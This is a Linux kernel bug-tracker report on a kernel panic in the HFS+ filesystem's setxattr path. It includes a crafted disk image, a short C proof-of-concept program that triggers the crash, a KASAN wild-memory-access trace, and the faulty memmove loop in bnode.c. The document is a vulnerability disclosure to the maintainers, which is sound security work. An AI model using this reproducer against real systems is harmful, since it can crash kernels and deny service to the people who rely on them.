200289 – Kernel panic when calling setxattr() on a corrupted hfs+ image

Bug 200289 - Kernel panic when calling setxattr() on a corrupted hfs+ image

Summary: Kernel panic when calling setxattr() on a corrupted hfs+ image

Status:	NEW

Alias:	None

Product:	File System
Classification:	Unclassified
Component:	HFS/HFSPLUS (show other bugs)
Hardware:	All Linux

Importance:	P1 normal
Assignee:	fs_hfs@kernel-bugs.osdl.org

URL:
Keywords:

Depends on:
Blocks:

Reported:	2018-06-27 03:41 UTC by Wen Xu
Modified:	2018-06-27 03:41 UTC (History)
CC List:	1 user (show)

See Also:
Kernel Version:	4.18
Subsystem:
Regression:	No
Bisected commit-id:

Attachments
The (compressed) crafted image which causes crash (4.00 MB, application/octet-stream) 2018-06-27 03:41 UTC, Wen Xu	Details
Add an attachment (proposed patch, testcase, etc.)

Description Wen Xu 2018-06-27 03:41:04 UTC

Created attachment 276891 [details]
The (compressed) crafted image which causes crash

- Reproduce
# mkdir mnt
# mount -t hfsplus 81.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

static void activity(char *mpoint) {

  char *xattr;

  int err;

  static int buf[8192];
  memset(buf, 0, sizeof(buf));

  err = asprintf(&xattr, "%s/foo/bar/xattr", mpoint);

  // xattr
  char buf2[113];
  memset(buf2, 0, sizeof(buf2));
  listxattr(xattr, buf2, sizeof(buf2));
  removexattr(xattr, "user.mime_type");
  setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE);
  setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE);

}

int main(int argc, char *argv[]) {
  activity(argv[1]);
  return 0;
}

- Kernel message
[  178.302459] ==================================================================
[  178.304073] BUG: KASAN: wild-memory-access in hfsplus_bnode_move+0x1a4/0x660
[  178.305510] Read of size 18446744073709551602 at addr 000508000000100e by task a.out/1364

[  178.307485] CPU: 0 PID: 1364 Comm: a.out Not tainted 4.18.0-rc1+ #6
[  178.307488] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  178.307494] Call Trace:
[  178.307532]  dump_stack+0x7b/0xb5
[  178.307568]  kasan_report+0x10c/0x390
[  178.307573]  ? hfsplus_bnode_move+0x1a4/0x660
[  178.307590]  check_memory_region+0x139/0x190
[  178.307595]  memmove+0x23/0x50
[  178.307600]  hfsplus_bnode_move+0x1a4/0x660
[  178.307606]  hfsplus_brec_insert+0x371/0x6c0
[  178.307612]  ? hfsplus_brec_keylen+0x130/0x130
[  178.307617]  ? __kmalloc+0x11f/0x240
[  178.307623]  hfsplus_create_attr+0x263/0x2b0
[  178.307628]  ? hfsplus_attr_exists+0x140/0x140
[  178.307636]  ? strncmp+0x3d/0xc0
[  178.307641]  __hfsplus_setxattr+0x2d5/0x1160
[  178.307672]  ? unwind_get_return_address+0x36/0x50
[  178.307678]  ? kasan_check_write+0x14/0x20
[  178.307693]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  178.307700]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  178.307705]  ? save_stack+0x46/0xd0
[  178.307708]  ? kasan_kmalloc+0xad/0xe0
[  178.307712]  ? kmem_cache_alloc_trace+0x102/0x200
[  178.307717]  ? hfsplus_setxattr+0x4c/0xb0
[  178.307720]  ? hfsplus_user_setxattr+0x27/0x30
[  178.307733]  ? __vfs_setxattr+0x7c/0xa0
[  178.307738]  ? __vfs_setxattr_noperm+0x8d/0x200
[  178.307741]  ? vfs_setxattr+0xb3/0xc0
[  178.307745]  ? setxattr+0x1b3/0x260
[  178.307748]  ? path_setxattr+0x134/0x170
[  178.307752]  ? __x64_sys_setxattr+0x6d/0x80
[  178.307766]  ? do_syscall_64+0x78/0x170
[  178.307771]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  178.307777]  ? save_stack+0xb5/0xd0
[  178.307780]  ? save_stack+0x46/0xd0
[  178.307783]  ? kasan_kmalloc+0xad/0xe0
[  178.307791]  ? __kmalloc_node+0x11e/0x2e0
[  178.307807]  ? kvmalloc_node+0x31/0x80
[  178.307811]  ? setxattr+0x114/0x260
[  178.307815]  ? path_setxattr+0x134/0x170
[  178.307819]  ? __x64_sys_setxattr+0x6d/0x80
[  178.307822]  ? do_syscall_64+0x78/0x170
[  178.307827]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  178.307831]  ? save_stack+0xb5/0xd0
[  178.307834]  ? save_stack+0x46/0xd0
[  178.307838]  ? __kasan_slab_free+0x13c/0x1a0
[  178.307841]  ? kasan_slab_free+0xe/0x10
[  178.307845]  ? kmem_cache_free+0x89/0x1e0
[  178.307854]  ? putname+0x80/0x90
[  178.307858]  ? filename_lookup+0x191/0x280
[  178.307862]  ? kasan_unpoison_shadow+0x36/0x50
[  178.307866]  ? kasan_kmalloc+0xad/0xe0
[  178.307871]  ? kmem_cache_alloc_trace+0x102/0x200
[  178.307877]  hfsplus_setxattr+0x8a/0xb0
[  178.307881]  hfsplus_user_setxattr+0x27/0x30
[  178.307885]  __vfs_setxattr+0x7c/0xa0
[  178.307890]  __vfs_setxattr_noperm+0x8d/0x200
[  178.307894]  vfs_setxattr+0xb3/0xc0
[  178.307898]  setxattr+0x1b3/0x260
[  178.307902]  ? vfs_setxattr+0xc0/0xc0
[  178.307906]  ? filename_lookup+0x191/0x280
[  178.307910]  ? filename_parentat+0x2b0/0x2b0
[  178.307914]  ? kasan_kmalloc+0xad/0xe0
[  178.307919]  ? kasan_check_write+0x14/0x20
[  178.307942]  ? strncpy_from_user+0xa8/0x1c0
[  178.307954]  ? __mnt_is_readonly.part.13+0x23/0x30
[  178.307960]  ? __mnt_want_write+0x9d/0xb0
[  178.307964]  path_setxattr+0x134/0x170
[  178.307969]  ? setxattr+0x260/0x260
[  178.307978]  ? vm_brk+0x20/0x20
[  178.307984]  __x64_sys_setxattr+0x6d/0x80
[  178.307988]  do_syscall_64+0x78/0x170
[  178.307994]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  178.308016] RIP: 0033:0x7f73a2b2c1fa
[  178.308017] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  178.308078] RSP: 002b:00007fffa19f7418 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc
[  178.308087] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f73a2b2c1fa
[  178.308090] RDX: 00007fffa19f7440 RSI: 00000000004008a4 RDI: 0000000001389080
[  178.308092] RBP: 00007fffa19f74c0 R08: 0000000000000001 R09: 0000000000000000
[  178.308095] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0
[  178.308097] R13: 00007fffa19f75c0 R14: 0000000000000000 R15: 0000000000000000
[  178.308102] ==================================================================
[  178.309572] Disabling lock debugging due to kernel taint
[  178.309830] general protection fault: 0000 [#1] SMP KASAN PTI
[  178.311012] CPU: 0 PID: 1364 Comm: a.out Tainted: G    B             4.18.0-rc1+ #6
[  178.312569] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  178.314462] RIP: 0010:__memmove+0x3d/0x1a0
[  178.315292] Code: 89 f0 49 01 d0 49 39 f8 0f 8f 9f 00 00 00 66 66 90 66 66 90 48 81 fa a8 02 00 00 72 05 40 38 fe 74 3b 48 83 ea 20 48 83 ea 20 <4c> 8b 1e 4c 8b 56 08 4c 8b 4e 10 4c 8b 46 18 48 8d 76 20 4c 89 1f
[  178.319037] RSP: 0018:ffff8801f243f528 EFLAGS: 00010286
[  178.320083] RAX: ffff8801d19420ae RBX: fffffffffffffff2 RCX: ffffffffad5b3a54
[  178.322245] RDX: ffffffffffffffb2 RSI: 000508000000100e RDI: ffff8801d19420ae
[  178.323686] RBP: ffff8801f243f548 R08: ffffed003a337e01 R09: ffffed003a328414
[  178.325139] R10: ffffffffffffffff R11: ffffed003a328413 R12: ffff8801d19420ae
[  178.326571] R13: 000508000000100e R14: ffff8801e04b9350 R15: ffff8801e04b9348
[  178.328004] FS:  00007f73a300b700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  178.329647] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  178.330809] CR2: 0000000001389008 CR3: 00000001e58ca000 CR4: 00000000000006f0
[  178.341180] Call Trace:
[  178.342118]  ? memmove+0x45/0x50
[  178.343186]  hfsplus_bnode_move+0x1a4/0x660
[  178.344051]  hfsplus_brec_insert+0x371/0x6c0
[  178.344946]  ? hfsplus_brec_keylen+0x130/0x130
[  178.345858]  ? __kmalloc+0x11f/0x240
[  178.346609]  hfsplus_create_attr+0x263/0x2b0
[  178.347488]  ? hfsplus_attr_exists+0x140/0x140
[  178.348418]  ? strncmp+0x3d/0xc0
[  178.349091]  __hfsplus_setxattr+0x2d5/0x1160
[  178.349970]  ? unwind_get_return_address+0x36/0x50
[  178.350952]  ? kasan_check_write+0x14/0x20
[  178.351795]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  178.353173]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  178.354364]  ? save_stack+0x46/0xd0
[  178.355088]  ? kasan_kmalloc+0xad/0xe0
[  178.355862]  ? kmem_cache_alloc_trace+0x102/0x200
[  178.356842]  ? hfsplus_setxattr+0x4c/0xb0
[  178.357671]  ? hfsplus_user_setxattr+0x27/0x30
[  178.358845]  ? __vfs_setxattr+0x7c/0xa0
[  178.359639]  ? __vfs_setxattr_noperm+0x8d/0x200
[  178.360683]  ? vfs_setxattr+0xb3/0xc0
[  178.361706]  ? setxattr+0x1b3/0x260
[  178.362432]  ? path_setxattr+0x134/0x170
[  178.363241]  ? __x64_sys_setxattr+0x6d/0x80
[  178.364099]  ? do_syscall_64+0x78/0x170
[  178.365000]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  178.366063]  ? save_stack+0xb5/0xd0
[  178.366786]  ? save_stack+0x46/0xd0
[  178.367503]  ? kasan_kmalloc+0xad/0xe0
[  178.368386]  ? __kmalloc_node+0x11e/0x2e0
[  178.369208]  ? kvmalloc_node+0x31/0x80
[  178.369979]  ? setxattr+0x114/0x260
[  178.370698]  ? path_setxattr+0x134/0x170
[  178.371504]  ? __x64_sys_setxattr+0x6d/0x80
[  178.372472]  ? do_syscall_64+0x78/0x170
[  178.373261]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  178.374318]  ? save_stack+0xb5/0xd0
[  178.375036]  ? save_stack+0x46/0xd0
[  178.375753]  ? __kasan_slab_free+0x13c/0x1a0
[  178.376636]  ? kasan_slab_free+0xe/0x10
[  178.377424]  ? kmem_cache_free+0x89/0x1e0
[  178.378245]  ? putname+0x80/0x90
[  178.378913]  ? filename_lookup+0x191/0x280
[  178.379750]  ? kasan_unpoison_shadow+0x36/0x50
[  178.380762]  ? kasan_kmalloc+0xad/0xe0
[  178.381532]  ? kmem_cache_alloc_trace+0x102/0x200
[  178.382490]  hfsplus_setxattr+0x8a/0xb0
[  178.383276]  hfsplus_user_setxattr+0x27/0x30
[  178.384256]  __vfs_setxattr+0x7c/0xa0
[  178.385009]  __vfs_setxattr_noperm+0x8d/0x200
[  178.385896]  vfs_setxattr+0xb3/0xc0
[  178.386614]  setxattr+0x1b3/0x260
[  178.387296]  ? vfs_setxattr+0xc0/0xc0
[  178.388044]  ? filename_lookup+0x191/0x280
[  178.388894]  ? filename_parentat+0x2b0/0x2b0
[  178.389767]  ? kasan_kmalloc+0xad/0xe0
[  178.390540]  ? kasan_check_write+0x14/0x20
[  178.391379]  ? strncpy_from_user+0xa8/0x1c0
[  178.392250]  ? __mnt_is_readonly.part.13+0x23/0x30
[  178.393228]  ? __mnt_want_write+0x9d/0xb0
[  178.394054]  path_setxattr+0x134/0x170
[  178.394822]  ? setxattr+0x260/0x260
[  178.395543]  ? vm_brk+0x20/0x20
[  178.396207]  __x64_sys_setxattr+0x6d/0x80
[  178.397031]  do_syscall_64+0x78/0x170
[  178.397791]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  178.398820] RIP: 0033:0x7f73a2b2c1fa
[  178.399552] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  178.403344] RSP: 002b:00007fffa19f7418 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc
[  178.404860] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f73a2b2c1fa
[  178.406278] RDX: 00007fffa19f7440 RSI: 00000000004008a4 RDI: 0000000001389080
[  178.407698] RBP: 00007fffa19f74c0 R08: 0000000000000001 R09: 0000000000000000
[  178.409124] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0
[  178.410533] R13: 00007fffa19f75c0 R14: 0000000000000000 R15: 0000000000000000
[  178.411951] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  178.421820] ---[ end trace 7f5a46c7478f1295 ]---
[  178.422779] RIP: 0010:__memmove+0x3d/0x1a0
[  178.423609] Code: 89 f0 49 01 d0 49 39 f8 0f 8f 9f 00 00 00 66 66 90 66 66 90 48 81 fa a8 02 00 00 72 05 40 38 fe 74 3b 48 83 ea 20 48 83 ea 20 <4c> 8b 1e 4c 8b 56 08 4c 8b 4e 10 4c 8b 46 18 48 8d 76 20 4c 89 1f
[  178.427440] RSP: 0018:ffff8801f243f528 EFLAGS: 00010286
[  178.428652] RAX: ffff8801d19420ae RBX: fffffffffffffff2 RCX: ffffffffad5b3a54
[  178.430077] RDX: ffffffffffffffb2 RSI: 000508000000100e RDI: ffff8801d19420ae
[  178.431488] RBP: ffff8801f243f548 R08: ffffed003a337e01 R09: ffffed003a328414
[  178.432950] R10: ffffffffffffffff R11: ffffed003a328413 R12: ffff8801d19420ae
[  178.434376] R13: 000508000000100e R14: ffff8801e04b9350 R15: ffff8801e04b9348
[  178.435793] FS:  00007f73a300b700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  178.437444] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  178.438593] CR2: 0000000001389008 CR3: 00000001e58ca000 CR4: 00000000000006f0

- Location
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/bnode.c#L205
			while (src < len) {
				memmove(kmap(*dst_page), kmap(*src_page), src);
				kunmap(*src_page);
				set_page_dirty(*dst_page);
				kunmap(*dst_page);
				len -= src;
				src = PAGE_SIZE;
				src_page--;
				dst_page--;
			}
memmove() accesses wild memory which leads to kernel panic

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.

Note You need to log in before you can comment on or make changes to this bug.